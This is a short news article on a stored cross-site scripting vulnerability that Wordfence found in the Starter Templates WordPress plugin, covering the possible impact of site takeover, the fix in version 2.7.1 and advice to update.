The Starter Templates — Elementor, Gutenberg, and Beaver Builder Templates plugin by the Astra WordPress theme’s authors contain a vulnerability that affects over a million websites. An attacker can use the exploit to upload malicious scripts, stage a total site takeover, and attack visitors to the vulnerable website.
Elementor, Gutenberg, and Beaver Builder Starter Templates
Brainstorm Force, the creators of the wildly popular Astra WordPress theme, released the Starter Templates plugin. The plugin enables users to use over 280 WordPress templates, which aid in the development of websites.
The templates have been designed to work with Elementor, Gutenberg, Brizy, and Beaver Builder, as well as the Astra theme.
Over a million websites have the plugin installed.
Read The Best Music Streaming Apps for iPhones.
Vulnerability for Stored Cross-Site Scripting (XSS)
Wordfence security researchers discovered a type of vulnerability in the Brainstorm Force Starter Templates plugin that allows an attacker to upload a malicious script that is then stored on the website itself.
Because the uploaded script is stored on the server of the attacked site, a Stored XSS vulnerability is especially troublesome.
On their website, the non-profit Open Web Application Security Project (OWASP) describes the gravity of this type of XSS vulnerability:
“Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc.
The victim then retrieves the malicious script from the server when it requests the stored information.”
Attacks on Website Visitors and Website Takeover
The vulnerability could result in a complete site takeover, as well as the use of the vulnerable website to launch attacks on all site visitors.wikinbiography.com
According to a Wordfence report:
“An attacker could craft and host a block containing malicious JavaScript on a server they controlled, and then use it to overwrite any post or page…
Any post or page that had been built with Elementor, including published pages, could be overwritten by the imported block, and the malicious JavaScript in the imported block would then be executed in the browser of any visitors to that page.
This could be used to redirect site visitors to malicious websites, or hijack an administrator’s session in order to create a new malicious administrator or add a backdoor to the site, leading to site takeover.”
Starter Templates Plugin has been repaired
Wordfence notified the Starter Templates plugin’s publishers of the vulnerability, and the plugin was promptly patched in version 2.7.1.
The patch is accurately recorded in the Starter Templates plugin’s public changelog:
v2.7.1 – 7-October-2021
– Security Improvement: Validate the site URL before processing the import request.
– Security Improvement: Updated right file upload permission before importing images.
An honest changelog, such as the one published by Brainstorm Force, is a sign of a good publisher, and it’s great to see them being open about addressing security issues.
Wordfence Recommends Publishers Update Their Plugin
Wordfence recommends that all publishers who use this plugin update to the most recent version, 2.7.5 because it contains important bug fixes.
Need help with our free SEO tools? Try our free Link Analyzer, Website Links Count Checker, Link Price Calculator.
Learn more from WordPress and read Vulnerability in the WordPress Plugin OptinMonster Affects +1 Million Sites.
